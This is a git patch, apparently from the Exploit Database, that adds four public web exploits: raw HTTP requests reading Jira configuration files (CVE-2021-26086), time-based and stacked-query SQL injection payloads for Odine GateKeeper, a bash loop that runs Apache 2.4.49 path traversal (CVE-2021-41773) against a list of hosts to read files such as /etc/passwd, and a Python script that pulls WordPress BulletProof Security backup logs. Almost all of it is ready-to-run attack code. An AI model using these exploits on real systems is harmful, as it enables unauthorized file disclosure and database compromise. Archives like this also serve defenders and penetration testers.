From bd08b79b4a7ca69cfb504b6e45a0642c4300ce86 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 7 Oct 2021 05:02:12 +0000
Subject: [PATCH] DB: 2021-10-07
4 changes to exploits/shellcodes
Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read
Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure
Apache HTTP Server 2.4.49 - Path Traversal
---
exploits/multiple/webapps/50380.txt | 87 +++++++++++++++++++++++++++++
exploits/multiple/webapps/50381.txt | 42 ++++++++++++++
exploits/multiple/webapps/50383.sh | 18 ++++++
exploits/php/webapps/50382.py | 59 +++++++++++++++++++
files_exploits.csv | 4 ++
5 files changed, 210 insertions(+)
create mode 100644 exploits/multiple/webapps/50380.txt
create mode 100644 exploits/multiple/webapps/50381.txt
create mode 100755 exploits/multiple/webapps/50383.sh
create mode 100755 exploits/php/webapps/50382.py
diff --git a/exploits/multiple/webapps/50380.txt b/exploits/multiple/webapps/50380.txt
new file mode 100644
index 000000000..275fef744
--- /dev/null
+++ b/exploits/multiple/webapps/50380.txt
@@ -0,0 +1,87 @@
+# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read
+# Date: 2021-10-05
+# Exploit Author: Mayank Deshmukh
+# Vendor Homepage: https://www.atlassian.com/
+# Software Link: https://www.atlassian.com/software/jira/download/data-center
+# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
+# Tested on: Kali Linux & Windows 10
+# CVE : CVE-2021-26086
+
+POC File #1 - web.xml
+
+GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+
+POC File #2 - seraph-config.xml
+
+GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC File #3 - decorators.xml
+
+GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+
+POC File #4 - /jira-webapp-dist/pom.properties
+
+GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC File #5 - /jira-webapp-dist/pom.xml
+
+GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC File #6 - /atlassian-jira-webapp/pom.xml
+
+GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC File #7 - /atlassian-jira-webapp/pom.properties
+
+GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1
+Host: 127.0.0.1:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50381.txt b/exploits/multiple/webapps/50381.txt
new file mode 100644
index 000000000..039cff2cf
--- /dev/null
+++ b/exploits/multiple/webapps/50381.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
+# Date: 05.10.2021
+# Exploit Author: Emel Basayar
+# Vendor: Odine Solutions - odinesolutions.com
+# Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/
+# Version: 1.0
+# Category: Webapps
+# Tested on: Ubuntu 18 TLS
+# Description : The vulnerability allows an attacker to inject sql commands from search section with 'trafficCycle' parameter.
+# This vulnerability was discovered during the penetration testing and the vulnerability was fixed.
+====================================================
+
+# PoC : SQLi :
+
+GET /rass/api/v1/trafficCycle/98 HTTP/1.1
+Host: 192.168.1.25
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
+Accept: application/json
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx
+Origin: https://192.168.1.25
+Connection: close
+Referer: https://192.168.1.25
+
+Parameter: #1* (URI)
+ Type: error-based
+ Title: PostgreSQL AND error-based - WHERE or HAVING clause
+ Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB
+
+ Type: stacked queries
+ Title: PostgreSQL > 8.1 stacked queries (comment)
+ Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98';SELECT PG_SLEEP(5)--
+
+ Type: time-based blind
+ Title: PostgreSQL > 8.1 AND time-based blind
+ Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC
+---
+web application technology: Nginx
+back-end DBMS: PostgreSQL
+
+====================================================
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50383.sh b/exploits/multiple/webapps/50383.sh
new file mode 100755
index 000000000..aea6670d4
--- /dev/null
+++ b/exploits/multiple/webapps/50383.sh
@@ -0,0 +1,18 @@
+# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal
+# Date: 10/05/2021
+# Exploit Author: Lucas Souza https://lsass.io
+# Vendor Homepage: https://apache.org/
+# Version: 2.4.49
+# Tested on: 2.4.49
+# CVE : CVE-2021-41773
+# Credits: Ash Daulton and the cPanel Security Team
+
+#!/bin/bash
+
+if [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then
+echo Set [TAGET-LIST.TXT] [PATH]
+echo ./PoC.sh targets.txt /etc/passwd
+exit
+fi
+for host in $(cat $1); do
+curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
\ No newline at end of file
diff --git a/exploits/php/webapps/50382.py b/exploits/php/webapps/50382.py
new file mode 100755
index 000000000..cb242843b
--- /dev/null
+++ b/exploits/php/webapps/50382.py
@@ -0,0 +1,59 @@
+# Exploit Title: Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure
+# Date 04.10.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://forum.ait-pro.com/read-me-first/
+# Software Link: https://downloads.wordpress.org/plugin/bulletproof-security.5.1.zip
+# Version: <= 5.1
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2021-39327
+# CWE: CWE-200
+# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39327/README.md
+
+
+'''
+Description:
+The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible
+~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files.
+This affects versions up to, and including, 5.1.
+'''
+
+'''
+'Banner:
+'''
+banner = '''
+ ______ _______ ____ ___ ____ _ _____ ___ _________ _____
+ / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ // _ \___ /___ \___ |
+| | \ \ / /| _| _____ __) | | | |__) | |_____ |_ \ (_) ||_ \ __) | / /
+| |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__) \__, |__) / __/ / /
+ \____| \_/ |_____| |_____|\___/_____|_| |____/ /_/____/_____/_/
+
+ * Sensitive information disclosure
+ @ Author: Ron Jost
+'''
+print(banner)
+
+
+import argparse
+import requests
+
+'''
+User-Input:
+'''
+my_parser = argparse.ArgumentParser(description='Wordpress Plugin BulletProof Security - Sensitive information disclosure')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--PATH', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+wp_path = args.PATH
+print('')
+print('[*] Starting Exploit:')
+print('')
+
+paths = ["/wp-content/bps-backup/logs/db_backup_log.txt", "/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"]
+
+# Exploit
+for pathadd in paths:
+ x = requests.get("http://" + target_ip + ':' + target_port + '/' + wp_path + pathadd)
+ print(x.text)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 52036d535..8ad474693 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44492,3 +44492,7 @@ id,file,description,date,author,type,platform,port
50377,exploits/java/webapps/50377.txt,"Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,java,
50378,exploits/php/webapps/50378.py,"Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)",1970-01-01,spacehen,webapps,php,
50379,exploits/php/webapps/50379.py,"Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php,
+50380,exploits/multiple/webapps/50380.txt,"Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,multiple,
+50381,exploits/multiple/webapps/50381.txt,"Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection",1970-01-01,"Emel Basayar",webapps,multiple,
+50382,exploits/php/webapps/50382.py,"Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure",1970-01-01,"Ron Jost",webapps,php,
+50383,exploits/multiple/webapps/50383.sh,"Apache HTTP Server 2.4.49 - Path Traversal",1970-01-01,"Lucas Souza",webapps,multiple,